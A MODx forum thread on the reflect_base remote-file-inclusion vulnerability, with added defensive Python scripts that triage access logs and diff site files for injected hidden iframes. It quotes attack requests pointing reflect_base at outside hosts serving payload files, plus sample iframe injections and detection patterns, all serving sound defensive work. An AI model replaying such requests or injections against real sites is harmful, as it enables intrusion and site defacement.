    Quote from: rthrash at Apr 03, 2009, 11:57 PM

    How does treating files as PHP5 solve the register globals being on issue?
    Some hosts offer PHP4 with register_globals on by default and PHP5 with register_globals off by default, but that’s not a universal situation.
      "Things are not what they appear to be; nor are they otherwise." - Buddha

      "Well, gee, Buddha - that wasn't very helpful..." - ZAP

      Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options

      I am running MODx 0.9.6.3. In both CPanel and PHPInfo(), Register Globals is OFF (the server is running PHP 5.2.6). There is no snippet.reflect.php file in /assets/snippets/reflect/snippet.reflect.php ... I am assuming this is because it was removed from the download version back in November according to the Security Notice, whereas I only downloaded within the past few weeks.

      Or rather, I am *hoping* this is the case. From reading this thread and the Security Notice, my understanding is that as long as Register Globals is off, and there is no file called snippet.reflect.php, then I am okay? Because I have seen a lot of activity like this in logs today:

      //snippet.reflect.php?reflect_base=http://almanachtur.ru/images/crutz.txt?????
      /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://64.13.230.27/logs/tst.txt??

      I am not sure what the info in the log means. Are these just attempts, or do these entries mean someone’s actually managed to hack the site?

      I guess my main concern is that the Secunia advisory mentions possible username input exploits and SQL injections as well as the problem with the "reflect_base" parameter. The way the advisory reads, only the "reflect_base" parameter exploit is cured by Register Globals being set to OFF. My paranoid mind is wondering about the username and SQL injections as well.

      Thanks in advance for any light shed.



        The Secunia reports are *very* out of date. If register globals is off you should be fine.
          Did I help you? Buy me a beer
          Get my Book: MODX:The Official Guide
          MODX info for everyone: http://bobsguides.com/modx.html
          My MODX Extras
          Bob's Guides is now hosted at A2 MODX Hosting
          Quote from: BobRay at Apr 08, 2009, 01:16 AM

          The Secunia reports are *very* out of date. If register globals is off you should be fine.


          That is a relief - thank you, BobRay!
            You will probably also notice that the log entries for those attempts don’t show the response as 200 (OK), since you’ve deleted the snippet text file (although if you hadn’t deleted that file they would show 200 responses and you’d still be safe from this vulnerability because register_globals is off).

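The status-code reasoning in the post above is worth automating when a log is full of these probes. The mechanism behind it: with register_globals on, PHP turns the query parameter `reflect_base=...` into a plain `$reflect_base` variable before the script runs, so a script that builds an include path from that variable will fetch the attacker's URL; with register_globals off the parameter is only visible in `$_GET`, which the script never reads, and the request does nothing. So a 404 means the script is gone, a 200 means it ran, and a 200 is only evidence of compromise if register_globals (and PHP's remote include support) were on at the time. The triage script below is an added example, not MODx code or anything posted in the thread; the log lines in `SAMPLE_LOG` are constructed (client IPs from the TEST-NET range; the request targets mirror the two attempts quoted earlier in the thread), and the verdict names are my own.

```python
"""Triage Apache-style access-log lines for reflect_base remote-file-inclusion
probes against snippet.reflect.php.  Added example, not MODx code."""
import re
from urllib.parse import parse_qs, urlsplit

# Prefix of the Apache "common"/"combined" formats; referrer and UA are ignored.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Schemes PHP's include() will fetch over the network when remote includes
# are enabled (allow_url_include, or allow_url_fopen on older PHP).
REMOTE_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)
TARGET_SCRIPT = 'snippet.reflect.php'


def parse_line(line):
    """Return the fields of one log line, or None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields['status'] = int(fields['status'])
    return fields


def triage(line):
    """Classify one log line.

    Returns None for requests that do not touch the reflect snippet, otherwise
    a dict whose 'verdict' is one of:
      'rfi-served'   - remote URL in reflect_base and the script answered 200
      'rfi-rejected' - remote URL in reflect_base but a non-200 status (e.g.
                       404 once the snippet file has been deleted)
      'local'        - reflect_base present but not a remote URL
    """
    f = parse_line(line)
    if f is None:
        return None
    path, _, query = f['target'].partition('?')
    if not path.lower().endswith(TARGET_SCRIPT):
        return None
    # parse_qs also undoes %-encoding, so an encoded http%3A%2F%2F is caught.
    params = parse_qs(query, keep_blank_values=True)
    base = params.get('reflect_base', [''])[0]
    remote = bool(REMOTE_RE.match(base))
    # The trailing '?' or '??' seen in the thread's log lines is the attacker
    # turning whatever suffix the script appends to the path into a query
    # string of the remote URL, so the fetch still lands on the payload file.
    if remote:
        verdict = 'rfi-served' if f['status'] == 200 else 'rfi-rejected'
    else:
        verdict = 'local'
    return {
        'client': f['client'],
        'when': f['when'],
        'status': f['status'],
        'payload_host': urlsplit(base).hostname if remote else None,
        'verdict': verdict,
    }


def summarize(lines):
    """Count verdicts over an iterable of log lines; list payload hosts seen."""
    counts = {}
    hosts = set()
    for line in lines:
        hit = triage(line)
        if hit is None:
            continue
        counts[hit['verdict']] = counts.get(hit['verdict'], 0) + 1
        if hit['payload_host']:
            hosts.add(hit['payload_host'])
    return counts, sorted(hosts)


# Constructed sample lines (not real log data).
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Apr/2009:10:12:01 +0000] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://64.13.230.27/logs/tst.txt?? HTTP/1.1" 404 298 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [08/Apr/2009:10:12:03 +0000] "GET //snippet.reflect.php?reflect_base=http://almanachtur.ru/images/crutz.txt????? HTTP/1.1" 404 298 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [08/Apr/2009:11:40:17 +0000] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http%3A%2F%2F64.13.230.27%2Flogs%2Ftst.txt%3F%3F HTTP/1.0" 200 1532 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [08/Apr/2009:11:41:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for entry in SAMPLE_LOG:
        print(triage(entry))
    print(summarize(SAMPLE_LOG))
```

Run it over the real log with `summarize(open('access_log'))`. Any `rfi-served` hit on a host that had register_globals on at the time should be treated as a probable compromise and handled the way the later posts describe, not as a near miss; and the absence of such hits only clears this one vector, not the site as a whole.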
              Quote from: ZAP at Apr 09, 2009, 02:54 AM

              You will probably also notice that the log entries for those attempts don’t show the response as 200 (OK), since you’ve deleted the snippet text file (although if you hadn’t deleted that file they would show 200 responses and you’d still be safe from this vulnerability because register_globals is off).

              Zap, thank you for this. You’re right... they don’t show it as 200. :whew:
                I have a new install (less than a month old) and as I’m learning how to work with MODx, someone got in through what I think was this exploit and added links in a hidden iframe on my testing site. I can’t even figure out what all they changed, so I think I need to reinstall.

                I’ve read through this thread, but I haven’t been able to confirm 100% that this is what caused the problem. I’m running 0.9.6.3, and my big concern is that my site wasn’t even public, it was in a subdirectory of my site, and hardly ever enabled except when I was working on it and trying to learn this system. Is a big hole like this a common thing?

                Thanks for any help or direction you can give, I appreciate it. I’d really like to stick with this for my development platform, but this is a huge setback.
                    Any number of vectors could have been in play here. What does your main site run? Does your site have register_globals enabled?
                    Ryan Thrash, MODX Co-Founder
                    Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
                    Register_globals was enabled on my host, I disabled it this morning after reading the posts here.

                    My site runs on LAMP, my hosting provider is Hostmysite.com. I’m currently digging through the logs to see if there are any other clues I can find. Luckily it wasn’t a live site yet at least, but still, it’s a pain.
                      If the (reflect file + register_globals on) vulnerability was the way that they got access to your system, then they could have overwritten files on your server. If you’re not finding where the hidden iframe is being added to your pages, check index.php and also your site cache files. You should probably reupload all files with clean local backups and change your MODx and MySQL passwords right away.
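The checklist in the post above (find where the iframe is being added, check index.php and the cache files, reupload from clean local backups) can be made systematic rather than done by eye. The script below is an added example, not MODx code or anything the posters wrote: it hashes a clean local copy against the live tree to list modified, added and missing files, and greps text files for iframes hidden with display:none, visibility:hidden or zero/one-pixel dimensions. `build_demo()` writes two small constructed trees into a temporary directory so the script runs offline; their contents are hypothetical and the iframe pattern is a loose heuristic of my own, not a definition of what this attacker injected.

```python
"""Diff a live MODx file tree against a clean copy and grep for hidden
iframes.  Added example, not MODx code."""
import hashlib
import os
import re
import tempfile

# Text files worth grepping: PHP sources, templates, scripts and the site cache.
TEXT_EXT = {'.php', '.html', '.htm', '.tpl', '.js', '.txt'}

# Heuristic for an injected hidden iframe: an <iframe> tag carrying
# display:none / visibility:hidden, or a width or height of 0 or 1.
HIDDEN_IFRAME_RE = re.compile(
    r'<iframe\b[^>]*?(display\s*:\s*none|visibility\s*:\s*hidden'
    r'|\b(width|height)\s*=\s*["\']?[01]\b)[^>]*>',
    re.IGNORECASE | re.DOTALL,
)


def hash_tree(root):
    """Map each relative file path under root to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            h = hashlib.sha256()
            with open(full, 'rb') as fh:
                for chunk in iter(lambda: fh.read(65536), b''):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def diff_trees(clean_root, live_root):
    """Return (modified, added, missing) relative paths of live vs clean."""
    clean = hash_tree(clean_root)
    live = hash_tree(live_root)
    modified = sorted(p for p in clean if p in live and clean[p] != live[p])
    added = sorted(p for p in live if p not in clean)
    missing = sorted(p for p in clean if p not in live)
    return modified, added, missing


def find_hidden_iframes(root):
    """Return {relative path: [matching iframe tags]} for text files under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TEXT_EXT:
                continue
            full = os.path.join(dirpath, name)
            with open(full, 'r', encoding='utf-8', errors='replace') as fh:
                found = [m.group(0) for m in HIDDEN_IFRAME_RE.finditer(fh.read())]
            if found:
                hits[os.path.relpath(full, root).replace(os.sep, '/')] = found
    return hits


def _write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, 'w', encoding='utf-8') as fh:
        fh.write(text)


def build_demo():
    """Constructed clean and 'live' trees (hypothetical contents) for a dry run."""
    base = tempfile.mkdtemp(prefix='modx-check-')
    clean, live = os.path.join(base, 'clean'), os.path.join(base, 'live')
    index = "<?php\ninclude 'manager/includes/config.inc.php';\n"
    cache = "<?php\n$c = array();\n"
    for root in (clean, live):
        _write(root, 'index.php', index)
        _write(root, 'assets/cache/siteCache.idx.php', cache)
    # Tamper with the live copy in the two places the post says to check,
    # and drop one file that has no counterpart in the clean copy.
    _write(live, 'index.php', index +
           '<iframe src="http://203.0.113.77/x.html" style="display:none"></iframe>\n')
    _write(live, 'assets/cache/siteCache.idx.php', cache +
           '<iframe src="http://203.0.113.77/y.html" width=1 height=1></iframe>\n')
    _write(live, 'assets/images/.cache.php', "<?php /* not in the clean copy */\n")
    return clean, live


if __name__ == '__main__':
    clean_dir, live_dir = build_demo()
    print(diff_trees(clean_dir, live_dir))
    print(find_hidden_iframes(live_dir))
```

Point `diff_trees()` at the clean download and the live docroot before reuploading, so the list of added files (the ones with no clean counterpart) is captured as evidence rather than silently overwritten. A file-level comparison only covers what is on disk; anything the attacker changed in the database is outside its reach, which is one more reason the advice above to change the MODx and MySQL passwords matters.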